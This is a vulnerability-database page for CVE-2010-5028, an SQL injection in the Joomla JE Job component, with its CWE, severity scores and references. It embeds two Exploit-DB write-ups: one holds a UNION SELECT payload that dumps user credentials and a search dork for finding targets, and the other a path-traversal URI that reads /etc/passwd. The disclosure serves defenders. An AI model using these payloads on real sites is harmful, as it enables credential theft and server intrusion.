CVE-2010-5028 : Detail

CVE-2010-5028

SQL Injection
A03-Injection
17.12%V4
Network
2011-11-02
20h00 +00:00
2017-08-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 12782

Publication date : 2010-05-27 22h00 +00:00
Author : v3n0m
EDB Verified : Yes

) ) ) ( ( ( ( ( ) ) ( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /( )\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\()) ((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\ __ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_) \ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ / \ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' < |_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\ .WEB.ID ----------------------------------------------------------------------- Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability ----------------------------------------------------------------------- Author : v3n0m Site : http://yogyacarderlink.web.id/ Date : May, 29-2010 Location : Jakarta, Indonesia Time Zone : GMT +7:00 ---------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : JE Job Vendor : http://joomlaextensions.co.in/ License : GPLv2 Version : 1.0 Lower versions may also be affected Google Dork : inurl:com_jejob User can search the job by Location or by Job Title or by Experience. User can also see the job category at the front page. Category wise jobs are displayed in it. ---------------------------------------------------------------- Exploitz: ~~~~~~~ -9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users-- SQLi p0c: ~~~~~~~ http://127.0.0.1/[path]/index.php?option=com_jejob&view=item&catid=[SQLi] ---------------------------------------------------------------- Shoutz: ~~~~ - 'malingsial banyak cakap, you skill off bullshit on ' - LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi- - setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag - kiddies,whitehat,mywisdom,yadoy666,udhit - c4uR (besok² klo curhat jangan nangis lagi ah uR bruakakaka) - BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers) - elicha cristia [ Mizz U so much... ] - Joss [at] hack0wn.com - #yogyacarderlink @irc.dal.net ---------------------------------------------------------------- Contact: ~~~~ v3n0m | YOGYACARDERLINK CREW | v3n0m666[at]live[live]com Homepage: http://yogyacarderlink.web.id/ http://v3n0m.blogdetik.com/ http://elich4.blogspot.com/ << Update donk >_< ---------------------------[EOF]--------------------------------
Exploit Database EDB-ID : 12601

Publication date : 2010-05-13 22h00 +00:00
Author : Valentin
EDB Verified : Yes

# Exploit Title: Joomla Component JE Job Local File Inclusion Vulnerability # Date: 14.05.2010 # Author: Valentin # Category: webapps/0day # Version: unknown/latest one # Tested on: # CVE : # Code : [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::] >> General Information Advisory/Exploit Title = Joomla Component JE Job Local File Inclusion Vulnerability Author = Valentin Hoebel Contact = valentin@xenuser.org [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::] >> Product information Name = JE Job Component Vendor = Harmis Technology Vendor Website = http://joomlaextensions.co.in/ Affected Version(s) = unknown/latest one [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::] >> #1 Vulnerability Type = Local File Inclusion Example URI = index.php?option=com_jejob&view=../../../../../../etc/passwd%00 [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::] >> Additional Information Advisory/Exploit Published = 14.05.2010 Triggering MySQL errors and injecting chars through the URL is possible. Play around a little bit, e.g. index.php?option=com_jejob&view=item_detail&itemid=XX&Itemid=[CODE] index.php?option=com_jejob&view=item&catid=[TRIGGER ERROR] and you will see that your input affects many parts of the component. Maybe you can use this bug for your advantage. [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::] >> Misc Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase! <3 packetstormsecurity.org! [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]

Products Mentioned

Configuraton 0

Harmistechnology>>Com_jejob >> Version 1.0

    Joomla>>Joomla\! >> Version *

    References

    http://www.vupen.com/english/advisories/2010/1269
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.securityfocus.com/bid/40193
    Tags : vdb-entry, x_refsource_BID
    http://secunia.com/advisories/39837
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.exploit-db.com/exploits/12782
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.osvdb.org/64708
    Tags : vdb-entry, x_refsource_OSVDB